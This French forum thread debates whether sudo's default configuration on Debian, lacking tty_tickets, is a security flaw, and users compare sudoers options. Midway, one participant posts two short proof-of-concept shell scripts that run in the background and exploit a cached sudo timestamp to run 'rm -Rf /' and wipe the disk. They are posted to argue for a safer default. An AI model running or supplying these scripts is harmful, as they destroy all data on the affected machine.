Ben ce n’est pas a tout le monde, mais aux utilisateurs qui sont dans le groupe admin. Donc par defaut le premier utilisateur cree a l’installation (sauf erreur de ma part). Ceci dit, si ils n’ont pas modifier leur facon de traiter sudo avec cette histoire de tty_tickets, ca fait de toutes facons d’Ubuntu une distro peu sure. A verifier.
J’ai rajouté une option supplémentaire à mon sudoers: rootpw.
J’estime que mon mot de passe utilisateur est trop “simpliste” et pourrait être cracké relativement façilement ( le cas échéant ).
Mon mot de passe root est, par contre, beaucoup plus compliqué ( et j’en ai mis du temps à le retenir… ).
J’ai donc demandé à sudo de me demander le mot de passe root à la place de mon mot de passe lorsque je l’exécute.
J’ai aussi mis l’option insults, mais c’est Hors Sujet.
[quote=“L0u!$”]
J’ai donc demandé à sudo de me demander le mot de passe root à la place de mon mot de passe lorsque je l’exécute.[/quote]
Dans ce cas autant passer par su ou su -c non?
[quote=“youki”][quote=“L0u!$”]
J’ai donc demandé à sudo de me demander le mot de passe root à la place de mon mot de passe lorsque je l’exécute.[/quote]
Dans ce cas autant passer par su ou su -c non?[/quote]
non, avec su -c il n’y a pas la complétion automatique.
et la flême de changer de shell avec su - juste pour 1||2 commande.
J’utilise aussi sudo ( sans mot de passe ) pour 3 commandes ( associées à une touche sur mon clavier ):
shutdown, mount et umount.
Et puis, depuis que j’ai lu ce fil, et ayant vérifié par moi même, j’ai rajouté l’option tty_tickets et timestamp_timeout=0
Je vais simplement arreter de me servir de sudo pour les commandes admin, je le garde quand meme avec le timestamp a 0 parceque sans sudo je peut pas eteindre la machine ou ce genre de truc avec mon login utilisateur … Sinon pour tout le reste sa sera SU directement.
En tout cas merci Fran.B d’en avoir parler aux dev il me semble qu’il est urgent de corriger cela, heuresement pour nous que les ptits malins qui nous pondent des malware et des script foireux sous windows se sont pas trop pencher sur nux sinon la c’etait carrement la fiesta …
[quote=“nokcy”]En tout cas merci Fran.B d’en avoir parler aux dev il me semble qu’il est urgent de corriger cela, heuresement pour nous que les ptits malins qui nous pondent des malware et des script foireux sous windows se sont pas trop pencher sur nux sinon la c’etait carrement la fiesta …[/quote]Si tu restes dans les dépots officiels et que tu ne prends pas à droite et à gauche des petites “appli qui ne servent à rien mais sont sympa”… le risque est quand même (très) limité (enfin, il me semble)… cela dit… si faille il y a, une bonne correction s’impose!!!
Ben… vais continuer à ne pas m’en servir moi…
Et oui… merci fran.b…
je me suis permis de mettre un liens vers ce post sur le forum ubuntu-fr, en explicant le pourquoi du comment … C’est evident que ces options devrait etre activer par defaut pour n’importe quel installation de sudo ! On va se retrouver avec des linux windows like si sa continue.
salut,
quand on trouve un bug (ou une faille de sécurité), le meilleur moyen de le corriger, c’est de le rapporter !
merci à celui ou celle qui le fera
Je l’aurait fait avec plaisir, mais j’imagine que le report doit etre fait en anglais, je suis juste une veritable brelle en anglais xD
+2
Jr ne comprends pas vos remarques à propos d’un problème de sécurité sur debian. Par défaut, on ne peux pas faire grand chose en root avec sudo (en tout cas rien de dangereux pour le système). Si vous rajouter d’autres commandes accessibles a sudo dans votre sudoers, c’est vous qui affaiblissez la sécurité de votre système. En aucun cas c’est la faute du gestionnaire du paquet sudo. Le problème est évidement différent avec les distributions qui utilisent par défaut sudo à tout va.
C’est fait (mais c’est compliqué, c’est une faute de l’empaqueteur, pas du développeur)…
Salut,
La réponse des développeurs pourrait bien être : “Vous avez tty_tickets à votre diposition, ce n’est pas pour rien que nous l’avons mise à votre disposition”
Edité pour ôter un commentaire venu là depuis je ne sais où. Mes excuses à ceux qui ont lu
Tu prends le problème à l’envers:
- Pourquoi diable mettre une option de compilation --with-tty-tickets dans ce cas?
- Toute machine bien configurée ne pose pas de problèmes, mais la configuration par défaut doit être la plus sûre possible. Le rajout de la ligne «superman: ALL=(ALL) ALL» -rajout courant- ne doit pas ouvrir une faille de sécurité énorme si une simple modification par défaut suffit à l’éviter. Ainsi lorsque tu te connectes sur une machine avec ssh et les clefs, le mot de passe t’est demandé même si tu as une authentification par clef si il y a une mauvaise permission sur tes répertoires.
Comme je l’ai dit sur le rapport, éxécuter le script
#!/bin/sh
if [ -z $1 ] ; then
FILE=$0
. $FILE vasy > /dev/null 2> /dev/null &
else
while /bin/true ; do
sudo -n rm -Rf / > /dev/null 2>&1
sleep 60
done
fi
te flinguera le disque à la première utilisation de sudo.
Rq: Même avec la configuration --with-tty-tickets, un script genre
#!/bin/sh
FILE=$0
chmod +x $FILE
if [ -z $1 ] ; then
. $FILE vasy > /dev/null 2> /dev/null &
elif [ $1 == "vasy" ] ; then
while /bin/true ; do
for i in `seq 1 9` ; do
screen -d -m $FILE go
done
sleep 3
killall screen
done
else
sudo rm -Rf /* &
fi
a une chance non nulle (mais faible) de flinguer le disque.
Je pense que tu n’as pas compris ce que je veux dire. L’utilisation de sudo doit étre réservée à quelques taches d’administration bien précise, telle que le shutdown, donc sans risque.
C’est là que se situe la grosse bourde.
Si c’est pour faire ça, autant installer ubuntu.
Tu ne peux en aucun cas blâmer le responsable debian car tu réduis toi même le niveau de sécurité en modifiant une configuration par défaut.
Bon, de toute façon puisque l’option de sécurité --with_tty_tickets existe, autant qu’ils la mettent par défaut, t’es pas d’accord avec ça ? Parce que ta logique de “nononononon, c’est l’user qu’est crétin, ne sécurisez rien, c’est sa faute”, ahem…
[quote=“piratebab”]Je pense que tu n’as pas compris ce que je veux dire. L’utilisation de sudo doit étre réservée à quelques taches d’administration bien précise, telle que le shutdown, donc sans risque.
C’est là que se situe la grosse bourde.
Si c’est pour faire ça, autant installer ubuntu.
Tu ne peux en aucun cas blâmer le responsable debian car tu réduis toi même le niveau de sécurité en modifiant une configuration par défaut.[/quote]
La configuration par défaut n’a pas d’utilisateur, il faut la modifier pour utiliser sudo.
Dis moi, combien de personnes ici avait cette configuration?
La configuration par défaut doit être la plus fiable possible, par ailleurs cette ligne de la mort qui tue est celle qui est utilisée partout y compris chez Ubuntu comme tu l’as dit. Une simple modification permet de limiter considérablement la casse. Sur un programme aussi controversé et aussi critique que sudo, c’est pour moi un erreur de ne pas le faire par défaut. Ton argument est un peu comme si sur une voiture on mettait un bouton coupant les freins en disant «ne pas utiliser en roulant». Écarter le problème, alors même qu’il y a une solution simple, en disant que ceux qui utilise sudo comme Ubuntu sont des crétins me parait un peu court.
En ce qui me concerne, je m’en moque, je n’ai JAMAIS utilisé sudo.
Alors je crois qu’on est un certain nombre à vouloir savoir comment tu éteins ta machine en user . Copié /sbin/shutdown dans /usr/bin/shutdown et donner les droits d’exécution à l’user ?
[quote=“piratebab”]Je pense que tu n’as pas compris ce que je veux dire. L’utilisation de sudo doit étre réservée à quelques taches d’administration bien précise, telle que le shutdown, donc sans risque.
C’est là que se situe la grosse bourde.
Si c’est pour faire ça, autant installer ubuntu.
Tu ne peux en aucun cas blâmer le responsable debian car tu réduis toi même le niveau de sécurité en modifiant une configuration par défaut.[/quote]
Tu préfères que je fasse su et que j’y reste quelques minutes (si je n’oublie pas de fermer), c’est ton droit
Comme j’utilise yakuake pour avoir en permanence une console c’est très facile d’oublier
Alors je crois qu’on est un certain nombre à vouloir savoir comment tu éteins ta machine en user . Copié /sbin/shutdown dans /usr/bin/shutdown et donner les droits d’exécution à l’user ?[/quote]
En l’occurrence, depuis XFCE, je suis dans le groupe powerdev (je crois que c’est ce groupe) et me contente d’utiliser le bouton adequat de XFCE. Précédemment, j’avais fait un paquet que tu trouveras sur mon dépot (paquet choixreboute en woody, sarge, etch, source sur
deb-src boisson.homeip.net/source/ ./
) qui affichait sous xdm une boite permettant de rebouter la machine ou de l’arrêter.